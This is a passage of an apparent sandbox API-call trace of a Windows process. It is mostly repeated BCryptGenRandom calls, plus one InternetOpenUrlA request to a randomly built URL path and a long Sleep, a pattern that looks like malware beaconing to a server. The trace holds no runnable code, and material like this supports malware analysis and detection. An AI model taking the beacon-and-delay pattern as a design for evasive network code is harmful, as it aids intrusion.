0x7ffc5bcc36b0 [0180.069] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.069] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.069] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0180.069] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.069] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0180.070] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.070] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.070] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.070] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.070] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.070] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.071] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.071] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.071] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.071] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.071] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.071] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.071] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.071] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.072] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.072] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.072] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.072] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.072] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.072] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.072] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.072] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.073] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.073] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.073] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.073] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0180.073] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.073] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.073] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.074] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.074] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.074] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0180.074] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.074] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.074] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.074] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.074] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.075] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.075] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.075] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0180.075] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.075] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.075] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.075] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.076] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.076] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0180.076] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.076] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0180.077] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.077] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a021ee, cbBuffer=0x2f, dwFlags=0x2 | out: pbBuffer=0x3a021ee) returned 0x0 [0180.077] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.077] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.077] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.077] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.077] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.077] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.078] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.078] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.078] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.078] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0180.078] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.078] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.078] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.078] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.079] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.079] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.079] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.079] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.079] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.079] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.079] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.079] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.080] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.080] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0180.080] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.080] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.080] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.080] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.081] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.081] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0180.082] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.082] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0180.082] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.082] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.082] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.082] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.083] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.083] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.083] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.083] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.083] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.083] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.083] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.084] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.084] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.084] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.084] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.084] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0180.084] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.084] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.085] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.085] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.085] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.085] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.085] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.086] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.086] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.086] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.086] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.086] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.086] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.086] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.087] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.087] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.087] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.087] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.087] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.087] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.087] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.088] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0180.088] GetProcessHeap () returned 0x440000 [0180.088] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x4741c0 [0180.088] lstrcpyA (in: lpString1=0x4741c0, lpString2="P! \x03" | out: lpString1="P! \x03") returned="P! \x03" [0180.088] lstrcatA (in: lpString1="P! \x03", lpString2="/gJdiqxenFnwEhgpitwigz8zj8mV/8C8mziell04tGl0n1wmqgoHxwCZd9ikpR/mfiJk9ef4in2dab3TzYhu8pxqjtaqu0svvaeg9dOI2cmnl/9ftj3t3ywwmc02rjBhipcgxz9deeo0Irmjf89xlmcz3qp73/m8q2ja7vmxekeaTy2qw84ncoNhBhxvvp7gjbmeizqjkw3H/" | out: lpString1="P! \x03/gJdiqxenFnwEhgpitwigz8zj8mV/8C8mziell04tGl0n1wmqgoHxwCZd9ikpR/mfiJk9ef4in2dab3TzYhu8pxqjtaqu0svvaeg9dOI2cmnl/9ftj3t3ywwmc02rjBhipcgxz9deeo0Irmjf89xlmcz3qp73/m8q2ja7vmxekeaTy2qw84ncoNhBhxvvp7gjbmeizqjkw3H/") returned="P! \x03/gJdiqxenFnwEhgpitwigz8zj8mV/8C8mziell04tGl0n1wmqgoHxwCZd9ikpR/mfiJk9ef4in2dab3TzYhu8pxqjtaqu0svvaeg9dOI2cmnl/9ftj3t3ywwmc02rjBhipcgxz9deeo0Irmjf89xlmcz3qp73/m8q2ja7vmxekeaTy2qw84ncoNhBhxvvp7gjbmeizqjkw3H/" [0180.088] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0180.733] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="P! \x03/gJdiqxenFnwEhgpitwigz8zj8mV/8C8mziell04tGl0n1wmqgoHxwCZd9ikpR/mfiJk9ef4in2dab3TzYhu8pxqjtaqu0svvaeg9dOI2cmnl/9ftj3t3ywwmc02rjBhipcgxz9deeo0Irmjf89xlmcz3qp73/m8q2ja7vmxekeaTy2qw84ncoNhBhxvvp7gjbmeizqjkw3H/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0180.733] GetProcessHeap () returned 0x440000 [0180.734] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4741c0 | out: hHeap=0x440000) returned 1 [0180.734] GetProcessHeap () returned 0x440000 [0180.734] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a02150 | out: hHeap=0x440000) returned 1 [0180.735] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0180.735] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0180.736] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.736] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0180.737] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0180.737] Sleep (dwMilliseconds=0x17e0c) [0180.943] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.943] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0180.944] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.944] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0180.944] GetProcessHeap () returned 0x440000 [0180.944] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x64) returned 0x3a1b720 [0180.944] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.944] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0180.945] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.945] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b721, cbBuffer=0x19, dwFlags=0x2 | out: pbBuffer=0x3a1b721) returned 0x0 [0180.945] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.945] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.945] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.946] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0180.946] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.946] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.947] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.947] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.947] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.947] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0180.948] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.948] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.948] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.948] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0180.948] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.948] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.949] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.949] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.949] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.949] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.950] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.950] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.950] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.950] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.950] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.950] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.951] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.951] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.951] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.951] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.951] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.951] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.952] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.952] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.952] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.952] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) 